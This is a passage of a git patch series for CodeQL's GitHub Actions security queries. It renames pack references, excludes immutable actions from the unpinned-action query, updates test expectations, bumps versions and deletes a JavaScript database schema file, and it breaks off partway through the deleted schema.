b/ql/lib/ext/manual/yumemi-inc_changed-files.model.yml index c65f7b1055fb..db61e9171a87 100644 --- a/ql/lib/ext/manual/yumemi-inc_changed-files.model.yml +++ b/ql/lib/ext/manual/yumemi-inc_changed-files.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: # https://github.com/yumemi-inc/changed-files diff --git a/ql/lib/ext/manual/zaproxy_action-baseline.model.yml b/ql/lib/ext/manual/zaproxy_action-baseline.model.yml index 91df4767a728..309045ee58dc 100644 --- a/ql/lib/ext/manual/zaproxy_action-baseline.model.yml +++ b/ql/lib/ext/manual/zaproxy_action-baseline.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["zaproxy/action-baseline", "*", "input.docker_name", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/zaproxy_action-full-scan.model.yml b/ql/lib/ext/manual/zaproxy_action-full-scan.model.yml index 57f76c8cb4ab..9da3749ebe45 100644 --- a/ql/lib/ext/manual/zaproxy_action-full-scan.model.yml +++ b/ql/lib/ext/manual/zaproxy_action-full-scan.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["zaproxy/action-full-scan", "*", "input.docker_name", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/zentered_issue-forms-body-parser.model.yml b/ql/lib/ext/manual/zentered_issue-forms-body-parser.model.yml index 1a40a6341183..0cce7cc0cff7 100644 --- a/ql/lib/ext/manual/zentered_issue-forms-body-parser.model.yml +++ b/ql/lib/ext/manual/zentered_issue-forms-body-parser.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["zentered/issue-forms-body-parser", "*", "input.body", "output.data", "taint", "manual"] From e8ee798ffaa5a7f303f6af7ffb0a5cb956932222 Mon Sep 17 00:00:00 2001 From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Thu, 7 Nov 2024 15:29:28 -0500 Subject: [PATCH 670/707] add temporary immutable actions doc page --- ql/src/Security/CWE-829/UnversionedImmutableAction.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/src/Security/CWE-829/UnversionedImmutableAction.md b/ql/src/Security/CWE-829/UnversionedImmutableAction.md index 754fe75b62be..33701ec27e67 100644 --- a/ql/src/Security/CWE-829/UnversionedImmutableAction.md +++ b/ql/src/Security/CWE-829/UnversionedImmutableAction.md @@ -7,7 +7,7 @@ of the action stored in the GitHub package registry. The action code will not ch ## Recommendations -When using [immutable actions]() use the full semantic version of the action. This will ensure that the action is resolved to the exact version stored in the GitHub package registry. This will prevent the action code from changing between runs. +When using [immutable actions](https://github.com/github/package-registry-team/blob/main/docs/immutable-actions/immutable-actions-howto.md) use the full semantic version of the action. This will ensure that the action is resolved to the exact version stored in the GitHub package registry. This will prevent the action code from changing between runs. ## Examples From d6e38d5e83e162955f24ba5db5c2f84a0bbd466d Mon Sep 17 00:00:00 2001 From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Fri, 8 Nov 2024 11:51:25 -0500 Subject: [PATCH 671/707] Do not detect immutable actions in UnpinnedActionsTag * these should be handles by the UseOfUnversionedImmutableAction.qll query instead * factor out immutableAction detection for reuse in both queries * octokit should not longer ping in UnpinnedActionsTag --- .../actions/security/UseOfUnversionedImmutableAction.qll | 8 ++++++-- ql/src/Security/CWE-829/UnpinnedActionsTag.md | 2 +- ql/src/Security/CWE-829/UnpinnedActionsTag.ql | 8 +++++--- .../Security/CWE-829/UnpinnedActionsTag.expected | 5 ----- 4 files changed, 12 insertions(+), 11 deletions(-) diff --git a/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll b/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll index 2fd47e3f8e19..bd14b6749206 100644 --- a/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll +++ b/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll @@ -4,8 +4,7 @@ class UnversionedImmutableAction extends UsesStep { string immutable_action; UnversionedImmutableAction() { - immutableActionsDataModel(immutable_action) and - this.getCallee() = immutable_action and + isImmutableAction(this, immutable_action) and not isSemVer(this.getVersion()) } } @@ -23,3 +22,8 @@ predicate isSemVer(string version) { // or latest which will work or version = "latest" } + +predicate isImmutableAction(UsesStep actionStep, string actionName) { + immutableActionsDataModel(actionName) and + actionStep.getCallee() = actionName +} diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.md b/ql/src/Security/CWE-829/UnpinnedActionsTag.md index eab708f8602e..d7c114f0404e 100644 --- a/ql/src/Security/CWE-829/UnpinnedActionsTag.md +++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.md @@ -6,7 +6,7 @@ Using a tag for a 3rd party Action that is not pinned to a commit can lead to ex ## Recommendations -Pinning an action to a full length commit SHA is currently the only way to use an action as an immutable release. Pinning to a particular SHA helps mitigate the risk of a bad actor adding a backdoor to the action's repository, as they would need to generate a SHA-1 collision for a valid Git object payload. When selecting a SHA, you should verify it is from the action's repository and not a repository fork. +Pinning an action to a full length commit SHA is currently the only way to use a non-immutable action as an immutable release. Pinning to a particular SHA helps mitigate the risk of a bad actor adding a backdoor to the action's repository, as they would need to generate a SHA-1 collision for a valid Git object payload. When selecting a SHA, you should verify it is from the action's repository and not a repository fork. ## Examples diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql index e0e668edfa81..de8d3c2078a8 100644 --- a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql +++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql @@ -1,6 +1,6 @@ /** - * @name Unpinned tag for 3rd party Action in workflow - * @description Using a tag for a 3rd party Action that is not pinned to a commit can lead to executing an untrusted Action through a supply chain attack. + * @name Unpinned tag for a non-immutable Action in workflow + * @description Using a tag for a non-immutable Action that is not pinned to a commit can lead to executing an untrusted Action through a supply chain attack. * @kind problem * @security-severity 5.0 * @problem.severity recommendation @@ -12,6 +12,7 @@ */ import actions +import codeql.actions.security.UseOfUnversionedImmutableAction bindingset[version] private predicate isPinnedCommit(string version) { version.regexpMatch("^[A-Fa-f0-9]{40}$") } @@ -32,7 +33,8 @@ where ) and uses.getVersion() = version and not isTrustedOrg(repo) and - not isPinnedCommit(version) + not isPinnedCommit(version) and + not isImmutableAction(uses, repo) select uses.getCalleeNode(), "Unpinned 3rd party Action '" + name + "' step $@ uses '" + repo + "' with ref '" + version + "', not a pinned commit hash", uses, uses.toString() diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index aa19c08f2f06..848962e26bd6 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected @@ -10,12 +10,7 @@ | .github/workflows/issue_comment_3rd_party_action.yml:14:15:14:52 | xt0rted/pull-request-comment-branch@v2 | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Uses Step: comment-branch | | .github/workflows/issue_comment_3rd_party_action.yml:27:15:27:52 | xt0rted/pull-request-comment-branch@v2 | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Uses Step: comment-branch | | .github/workflows/issue_comment_3rd_party_action.yml:41:15:41:42 | eficode/resolve-pr-refs@main | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'eficode/resolve-pr-refs' with ref 'main', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Uses Step: refs | -| .github/workflows/issue_comment_octokit2.yml:13:15:13:41 | octokit/request-action@v2.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit2.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | -| .github/workflows/issue_comment_octokit2.yml:20:15:20:43 | octokit/request-action@v2.x.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x.x', not a pinned commit hash | .github/workflows/issue_comment_octokit2.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | | .github/workflows/issue_comment_octokit2.yml:34:15:34:42 | some-action/some-repo@latest | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'some-action/some-repo' with ref 'latest', not a pinned commit hash | .github/workflows/issue_comment_octokit2.yml:33:9:37:6 | Uses Step | Uses Step | -| .github/workflows/issue_comment_octokit.yml:13:15:13:41 | octokit/request-action@v2.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | -| .github/workflows/issue_comment_octokit.yml:20:15:20:41 | octokit/request-action@v2.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | -| .github/workflows/issue_comment_octokit.yml:104:15:104:43 | octokit/request-action@v2.0.2 | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | | .github/workflows/label_trusted_checkout1.yml:20:13:20:36 | completely/fakeaction@v2 | Unpinned 3rd party Action 'label_trusted_checkout1.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout1.yml:20:7:24:4 | Uses Step | Uses Step | | .github/workflows/label_trusted_checkout1.yml:24:13:24:37 | fakerepo/comment-on-pr@v1 | Unpinned 3rd party Action 'label_trusted_checkout1.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout1.yml:24:7:27:21 | Uses Step | Uses Step | | .github/workflows/label_trusted_checkout2.yml:21:13:21:36 | completely/fakeaction@v2 | Unpinned 3rd party Action 'label_trusted_checkout2.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout2.yml:21:7:25:4 | Uses Step | Uses Step | From 44fd14caaf023b055518ce7d1f11ce55db98d957 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 9 Nov 2024 10:40:04 +0100 Subject: [PATCH 672/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index a7df1c400bfc..b72f94d1bb15 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.85 +version: 0.2.0 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 96ba98407850..a9f045567b0b 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.85 +version: 0.2.0 groups: [actions, queries] suites: codeql-suites extractor: javascript From be8a49228f3de26952beece271a747bcbb62778c Mon Sep 17 00:00:00 2001 From: Dave Bartolomeo Date: Wed, 13 Nov 2024 13:42:57 -0500 Subject: [PATCH 673/707] Delete dbscheme Update after merge --- ql/lib/ext/config/immutable_actions.yml | 2 +- ql/lib/semmlecode.javascript.dbscheme | 1190 - ql/lib/semmlecode.javascript.dbscheme.stats | 28248 ---------------- ql/test/codeql-pack.lock.yml | 22 +- .../UnnecessaryUseOfAdvancedConfig.actual | 1 - 5 files changed, 17 insertions(+), 29446 deletions(-) delete mode 100644 ql/lib/semmlecode.javascript.dbscheme delete mode 100644 ql/lib/semmlecode.javascript.dbscheme.stats delete mode 100644 ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.actual diff --git a/ql/lib/ext/config/immutable_actions.yml b/ql/lib/ext/config/immutable_actions.yml index 072e8ed0b099..d6a9b1020d73 100644 --- a/ql/lib/ext/config/immutable_actions.yml +++ b/ql/lib/ext/config/immutable_actions.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: immutableActionsDataModel data: - ["actions/checkout"] diff --git a/ql/lib/semmlecode.javascript.dbscheme b/ql/lib/semmlecode.javascript.dbscheme deleted file mode 100644 index c88c69174bd0..000000000000 --- a/ql/lib/semmlecode.javascript.dbscheme +++ /dev/null @@ -1,1190 +0,0 @@ -/*** Standard fragments ***/ - -/*- Files and folders -*/ - -/** - * The location of an element. - * The location spans column `startcolumn` of line `startline` to - * column `endcolumn` of line `endline` in file `file`. - * For more information, see - * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). - */ -locations_default( - unique int id: @location_default, - int file: @file ref, - int beginLine: int ref, - int beginColumn: int ref, - int endLine: int ref, - int endColumn: int ref -); - -files( - unique int id: @file, - string name: string ref -); - -folders( - unique int id: @folder, - string name: string ref -); - -@container = @file | @folder - -containerparent( - int parent: @container ref, - unique int child: @container ref -); - -/*- Lines of code -*/ - -numlines( - int element_id: @sourceline ref, - int num_lines: int ref, - int num_code: int ref, - int num_comment: int ref -); - -/*- External data -*/ - -/** - * External data, loaded from CSV files during snapshot creation. See - * [Tutorial: Incorporating external data](https://help.semmle.com/wiki/display/SD/Tutorial%3A+Incorporating+external+data) - * for more information. - */ -externalData( - int id : @externalDataElement, - string path : string ref, - int column: int ref, - string value : string ref -); - -/*- Source location prefix -*/ - -/** - * The source location of the snapshot. - */ -sourceLocationPrefix(string prefix : string ref); - -/*- JavaScript-specific part -*/ - -@location = @location_default - -@sourceline = @locatable; - -filetype( - int file: @file ref, - string filetype: string ref -) - -// top-level code fragments -toplevels (unique int id: @toplevel, - int kind: int ref); - -is_externs (int toplevel: @toplevel ref); - -case @toplevel.kind of - 0 = @script -| 1 = @inline_script -| 2 = @event_handler -| 3 = @javascript_url -| 4 = @template_toplevel; - -is_module (int tl: @toplevel ref); -is_nodejs (int tl: @toplevel ref); -is_es2015_module (int tl: @toplevel ref); -is_closure_module (int tl: @toplevel ref); - -@xml_node_with_code = @xmlelement | @xmlattribute | @template_placeholder_tag; -toplevel_parent_xml_node( - unique int toplevel: @toplevel ref, - int xmlnode: @xml_node_with_code ref); - -xml_element_parent_expression( - unique int xmlnode: @xmlelement ref, - int expression: @expr ref, - int index: int ref); - -// statements -#keyset[parent, idx] -stmts (unique int id: @stmt, - int kind: int ref, - int parent: @stmt_parent ref, - int idx: int ref, - varchar(900) tostring: string ref); - -stmt_containers (unique int stmt: @stmt ref, - int container: @stmt_container ref); - -jump_targets (unique int jump: @stmt ref, - int target: @stmt ref); - -@stmt_parent = @stmt | @toplevel | @function_expr | @arrow_function_expr | @static_initializer; -@stmt_container = @toplevel | @function | @namespace_declaration | @external_module_declaration | @global_augmentation_declaration; - -case @stmt.kind of - 0 = @empty_stmt -| 1 = @block_stmt -| 2 = @expr_stmt -| 3 = @if_stmt -| 4 = @labeled_stmt -| 5 = @break_stmt -| 6 = @continue_stmt -| 7 = @with_stmt -| 8 = @switch_stmt -| 9 = @return_stmt -| 10 = @throw_stmt -| 11 = @try_stmt -| 12 = @while_stmt -| 13 = @do_while_stmt -| 14 = @for_stmt -| 15 = @for_in_stmt -| 16 = @debugger_stmt -| 17 = @function_decl_stmt -| 18 = @var_decl_stmt -| 19 = @case -| 20 = @catch_clause -| 21 = @for_of_stmt -| 22 = @const_decl_stmt -| 23 = @let_stmt -| 24 = @legacy_let_stmt -| 25 = @for_each_stmt -| 26 = @class_decl_stmt -| 27 = @import_declaration -| 28 = @export_all_declaration -| 29 = @export_default_declaration -| 30 = @export_named_declaration -| 31 = @namespace_declaration -| 32 = @import_equals_declaration -| 33 = @export_assign_declaration -| 34 = @interface_declaration -| 35 = @type_alias_declaration -| 36 = @enum_declaration -| 37 = @external_module_declaration -| 38 = @export_as_namespace_declaration -| 39 = @global_augmentation_declaration -| 40 = @using_decl_stmt -; - -@decl_stmt = @var_decl_stmt | @const_decl_stmt | @let_stmt | @legacy_let_stmt | @using_decl_stmt; - -@export_declaration = @export_all_declaration | @export_default_declaration | @export_named_declaration; - -@namespace_definition = @namespace_declaration | @enum_declaration; -@type_definition = @class_definition | @interface_declaration | @enum_declaration | @type_alias_declaration | @enum_member; - -is_instantiated(unique int decl: @namespace_declaration ref); - -@declarable_node = @decl_stmt | @namespace_declaration | @class_decl_stmt | @function_decl_stmt | @enum_declaration | @external_module_declaration | @global_augmentation_declaration | @field; -has_declare_keyword(unique int stmt: @declarable_node ref); - -is_for_await_of(unique int forof: @for_of_stmt ref); - -// expressions -#keyset[parent, idx] -exprs (unique int id: @expr, - int kind: int ref, - int parent: @expr_parent ref, - int idx: int ref, - varchar(900) tostring: string ref); - -literals (varchar(900) value: string ref, - varchar(900) raw: string ref, - unique int expr: @expr_or_type ref); - -enclosing_stmt (unique int expr: @expr_or_type ref, - int stmt: @stmt ref); - -expr_containers (unique int expr: @expr_or_type ref, - int container: @stmt_container ref); - -array_size (unique int ae: @arraylike ref, - int sz: int ref); - -is_delegating (int yield: @yield_expr ref); - -@expr_or_stmt = @expr | @stmt; -@expr_or_type = @expr | @typeexpr; -@expr_parent = @expr_or_stmt | @property | @function_typeexpr; -@arraylike = @array_expr | @array_pattern; -@type_annotation = @typeexpr | @jsdoc_type_expr; -@node_in_stmt_container = @cfg_node | @type_annotation | @toplevel; - -case @expr.kind of - 0 = @label -| 1 = @null_literal -| 2 = @boolean_literal -| 3 = @number_literal -| 4 = @string_literal -| 5 = @regexp_literal -| 6 = @this_expr -| 7 = @array_expr -| 8 = @obj_expr -| 9 = @function_expr -| 10 = @seq_expr -| 11 = @conditional_expr -| 12 = @new_expr -| 13 = @call_expr -| 14 = @dot_expr -| 15 = @index_expr -| 16 = @neg_expr -| 17 = @plus_expr -| 18 = @log_not_expr -| 19 = @bit_not_expr -| 20 = @typeof_expr -| 21 = @void_expr -| 22 = @delete_expr -| 23 = @eq_expr -| 24 = @neq_expr -| 25 = @eqq_expr -| 26 = @neqq_expr -| 27 = @lt_expr -| 28 = @le_expr -| 29 = @gt_expr -| 30 = @ge_expr -| 31 = @lshift_expr -| 32 = @rshift_expr -| 33 = @urshift_expr -| 34 = @add_expr -| 35 = @sub_expr -| 36 = @mul_expr -| 37 = @div_expr -| 38 = @mod_expr -| 39 = @bitor_expr -| 40 = @xor_expr -| 41 = @bitand_expr -| 42 = @in_expr -| 43 = @instanceof_expr -| 44 = @logand_expr -| 45 = @logor_expr -| 47 = @assign_expr -| 48 = @assign_add_expr -| 49 = @assign_sub_expr -| 50 = @assign_mul_expr -| 51 = @assign_div_expr -| 52 = @assign_mod_expr -| 53 = @assign_lshift_expr -| 54 = @assign_rshift_expr -| 55 = @assign_urshift_expr -| 56 = @assign_or_expr -| 57 = @assign_xor_expr -| 58 = @assign_and_expr -| 59 = @preinc_expr -| 60 = @postinc_expr -| 61 = @predec_expr -| 62 = @postdec_expr -| 63 = @par_expr -| 64 = @var_declarator -| 65 = @arrow_function_expr -| 66 = @spread_element -| 67 = @array_pattern -| 68 = @object_pattern -| 69 = @yield_expr -| 70 = @tagged_template_expr -| 71 = @template_literal -| 72 = @template_element -| 73 = @array_comprehension_expr -| 74 = @generator_expr -| 75 = @for_in_comprehension_block -| 76 = @for_of_comprehension_block -| 77 = @legacy_letexpr -| 78 = @var_decl -| 79 = @proper_varaccess -| 80 = @class_expr -| 81 = @super_expr -| 82 = @newtarget_expr -| 83 = @named_import_specifier -| 84 = @import_default_specifier -| 85 = @import_namespace_specifier -| 86 = @named_export_specifier -| 87 = @exp_expr -| 88 = @assign_exp_expr -| 89 = @jsx_element -| 90 = @jsx_qualified_name -| 91 = @jsx_empty_expr -| 92 = @await_expr -| 93 = @function_sent_expr -| 94 = @decorator -| 95 = @export_default_specifier -| 96 = @export_namespace_specifier -| 97 = @bind_expr -| 98 = @external_module_reference -| 99 = @dynamic_import -| 100 = @expression_with_type_arguments -| 101 = @prefix_type_assertion -| 102 = @as_type_assertion -| 103 = @export_varaccess -| 104 = @decorator_list -| 105 = @non_null_assertion -| 106 = @bigint_literal -| 107 = @nullishcoalescing_expr -| 108 = @e4x_xml_anyname -| 109 = @e4x_xml_static_attribute_selector -| 110 = @e4x_xml_dynamic_attribute_selector -| 111 = @e4x_xml_filter_expression -| 112 = @e4x_xml_static_qualident -| 113 = @e4x_xml_dynamic_qualident -| 114 = @e4x_xml_dotdotexpr -| 115 = @import_meta_expr -| 116 = @assignlogandexpr -| 117 = @assignlogorexpr -| 118 = @assignnullishcoalescingexpr -| 119 = @template_pipe_ref -| 120 = @generated_code_expr -| 121 = @satisfies_expr -; - -@varaccess = @proper_varaccess | @export_varaccess; -@varref = @var_decl | @varaccess; - -@identifier = @label | @varref | @type_identifier; - -@literal = @null_literal | @boolean_literal | @number_literal | @string_literal | @regexp_literal | @bigint_literal; - -@propaccess = @dot_expr | @index_expr; - -@invokeexpr = @new_expr | @call_expr; - -@unaryexpr = @neg_expr | @plus_expr | @log_not_expr | @bit_not_expr | @typeof_expr | @void_expr | @delete_expr | @spread_element; - -@equality_test = @eq_expr | @neq_expr | @eqq_expr | @neqq_expr; - -@comparison = @equality_test | @lt_expr | @le_expr | @gt_expr | @ge_expr; - -@binaryexpr = @comparison | @lshift_expr | @rshift_expr | @urshift_expr | @add_expr | @sub_expr | @mul_expr | @div_expr | @mod_expr | @exp_expr | @bitor_expr | @xor_expr | @bitand_expr | @in_expr | @instanceof_expr | @logand_expr | @logor_expr | @nullishcoalescing_expr; - -@assignment = @assign_expr | @assign_add_expr | @assign_sub_expr | @assign_mul_expr | @assign_div_expr | @assign_mod_expr | @assign_exp_expr | @assign_lshift_expr | @assign_rshift_expr | @assign_urshift_expr | @assign_or_expr | @assign_xor_expr | @assign_and_expr | @assignlogandexpr | @assignlogorexpr | @assignnullishcoalescingexpr; - -@updateexpr = @preinc_expr | @postinc_expr | @predec_expr | @postdec_expr; - -@pattern = @varref | @array_pattern | @object_pattern; - -@comprehension_expr = @array_comprehension_expr | @generator_expr; - -@comprehension_block = @for_in_comprehension_block | @for_of_comprehension_block; - -@import_specifier = @named_import_specifier | @import_default_specifier | @import_namespace_specifier; - -@exportspecifier = @named_export_specifier | @export_default_specifier | @export_namespace_specifier; - -@type_keyword_operand = @import_declaration | @export_declaration | @import_specifier; - -@type_assertion = @as_type_assertion | @prefix_type_assertion; - -@class_definition = @class_decl_stmt | @class_expr; -@interface_definition = @interface_declaration | @interface_typeexpr; -@class_or_interface = @class_definition | @interface_definition; - -@lexical_decl = @var_decl | @type_decl; -@lexical_access = @varaccess | @local_type_access | @local_var_type_access | @local_namespace_access; -@lexical_ref = @lexical_decl | @lexical_access; - -@e4x_xml_attribute_selector = @e4x_xml_static_attribute_selector | @e4x_xml_dynamic_attribute_selector; -@e4x_xml_qualident = @e4x_xml_static_qualident | @e4x_xml_dynamic_qualident; - -expr_contains_template_tag_location( - int expr: @expr ref, - int location: @location ref -); - -@template_placeholder_tag_parent = @xmlelement | @xmlattribute | @file; - -template_placeholder_tag_info( - unique int node: @template_placeholder_tag, - int parentNode: @template_placeholder_tag_parent ref, - varchar(900) raw: string ref -); - -// scopes -scopes (unique int id: @scope, - int kind: int ref); - -case @scope.kind of - 0 = @global_scope -| 1 = @function_scope -| 2 = @catch_scope -| 3 = @module_scope -| 4 = @block_scope -| 5 = @for_scope -| 6 = @for_in_scope // for-of scopes work the same as for-in scopes -| 7 = @comprehension_block_scope -| 8 = @class_expr_scope -| 9 = @namespace_scope -| 10 = @class_decl_scope -| 11 = @interface_scope -| 12 = @type_alias_scope -| 13 = @mapped_type_scope -| 14 = @enum_scope -| 15 = @external_module_scope -| 16 = @conditional_type_scope; - -scopenodes (unique int node: @ast_node ref, - int scope: @scope ref); - -scopenesting (unique int inner: @scope ref, - int outer: @scope ref); - -// functions -@function = @function_decl_stmt | @function_expr | @arrow_function_expr; - -@parameterized = @function | @catch_clause; -@type_parameterized = @function | @class_or_interface | @type_alias_declaration | @mapped_typeexpr | @infer_typeexpr; - -is_generator (int fun: @function ref); -has_rest_parameter (int fun: @function ref); -is_async (int fun: @function ref); - -// variables and lexically scoped type names -#keyset[scope, name] -variables (unique int id: @variable, - varchar(900) name: string ref, - int scope: @scope ref); - -#keyset[scope, name] -local_type_names (unique int id: @local_type_name, - varchar(900) name: string ref, - int scope: @scope ref); - -#keyset[scope, name] -local_namespace_names (unique int id: @local_namespace_name, - varchar(900) name: string ref, - int scope: @scope ref); - -is_arguments_object (int id: @variable ref); - -@lexical_name = @variable | @local_type_name | @local_namespace_name; - -@bind_id = @varaccess | @local_var_type_access; -bind (unique int id: @bind_id ref, - int decl: @variable ref); - -decl (unique int id: @var_decl ref, - int decl: @variable ref); - -@typebind_id = @local_type_access | @export_varaccess; -typebind (unique int id: @typebind_id ref, - int decl: @local_type_name ref); - -@typedecl_id = @type_decl | @var_decl; -typedecl (unique int id: @typedecl_id ref, - int decl: @local_type_name ref); - -namespacedecl (unique int id: @var_decl ref, - int decl: @local_namespace_name ref); - -@namespacebind_id = @local_namespace_access | @export_varaccess; -namespacebind (unique int id: @namespacebind_id ref, - int decl: @local_namespace_name ref); - - -// properties in object literals, property patterns in object patterns, and method declarations in classes -#keyset[parent, index] -properties (unique int id: @property, - int parent: @property_parent ref, - int index: int ref, - int kind: int ref, - varchar(900) tostring: string ref); - -case @property.kind of - 0 = @value_property -| 1 = @property_getter -| 2 = @property_setter -| 3 = @jsx_attribute -| 4 = @function_call_signature -| 5 = @constructor_call_signature -| 6 = @index_signature -| 7 = @enum_member -| 8 = @proper_field -| 9 = @parameter_field -| 10 = @static_initializer -; - -@property_parent = @obj_expr | @object_pattern | @class_definition | @jsx_element | @interface_definition | @enum_declaration; -@property_accessor = @property_getter | @property_setter; -@call_signature = @function_call_signature | @constructor_call_signature; -@field = @proper_field | @parameter_field; -@field_or_vardeclarator = @field | @var_declarator; - -is_computed (int id: @property ref); -is_method (int id: @property ref); -is_static (int id: @property ref); -is_abstract_member (int id: @property ref); -is_const_enum (int id: @enum_declaration ref); -is_abstract_class (int id: @class_decl_stmt ref); - -has_public_keyword (int id: @property ref); -has_private_keyword (int id: @property ref); -has_protected_keyword (int id: @property ref); -has_readonly_keyword (int id: @property ref); -has_type_keyword (int id: @type_keyword_operand ref); -is_optional_member (int id: @property ref); -has_definite_assignment_assertion (int id: @field_or_vardeclarator ref); -is_optional_parameter_declaration (unique int parameter: @pattern ref); - -#keyset[constructor, param_index] -parameter_fields( - unique int field: @parameter_field ref, - int constructor: @function_expr ref, - int param_index: int ref -); - -// types -#keyset[parent, idx] -typeexprs ( - unique int id: @typeexpr, - int kind: int ref, - int parent: @typeexpr_parent ref, - int idx: int ref, - varchar(900) tostring: string ref -); - -case @typeexpr.kind of - 0 = @local_type_access -| 1 = @type_decl -| 2 = @keyword_typeexpr -| 3 = @string_literal_typeexpr -| 4 = @number_literal_typeexpr -| 5 = @boolean_literal_typeexpr -| 6 = @array_typeexpr -| 7 = @union_typeexpr -| 8 = @indexed_access_typeexpr -| 9 = @intersection_typeexpr -| 10 = @parenthesized_typeexpr -| 11 = @tuple_typeexpr -| 12 = @keyof_typeexpr -| 13 = @qualified_type_access -| 14 = @generic_typeexpr -| 15 = @type_label -| 16 = @typeof_typeexpr -| 17 = @local_var_type_access -| 18 = @qualified_var_type_access -| 19 = @this_var_type_access -| 20 = @predicate_typeexpr -| 21 = @interface_typeexpr -| 22 = @type_parameter -| 23 = @plain_function_typeexpr -| 24 = @constructor_typeexpr -| 25 = @local_namespace_access -| 26 = @qualified_namespace_access -| 27 = @mapped_typeexpr -| 28 = @conditional_typeexpr -| 29 = @infer_typeexpr -| 30 = @import_type_access -| 31 = @import_namespace_access -| 32 = @import_var_type_access -| 33 = @optional_typeexpr -| 34 = @rest_typeexpr -| 35 = @bigint_literal_typeexpr -| 36 = @readonly_typeexpr -| 37 = @template_literal_typeexpr -; - -@typeref = @typeaccess | @type_decl; -@type_identifier = @type_decl | @local_type_access | @type_label | @local_var_type_access | @local_namespace_access; -@typeexpr_parent = @expr | @stmt | @property | @typeexpr; -@literal_typeexpr = @string_literal_typeexpr | @number_literal_typeexpr | @boolean_literal_typeexpr | @bigint_literal_typeexpr; -@typeaccess = @local_type_access | @qualified_type_access | @import_type_access; -@vartypeaccess = @local_var_type_access | @qualified_var_type_access | @this_var_type_access | @import_var_type_access; -@namespace_access = @local_namespace_access | @qualified_namespace_access | @import_namespace_access; -@import_typeexpr = @import_type_access | @import_namespace_access | @import_var_type_access; - -@function_typeexpr = @plain_function_typeexpr | @constructor_typeexpr; - -// types -types ( - unique int id: @type, - int kind: int ref, - varchar(900) tostring: string ref -); - -#keyset[parent, idx] -type_child ( - int child: 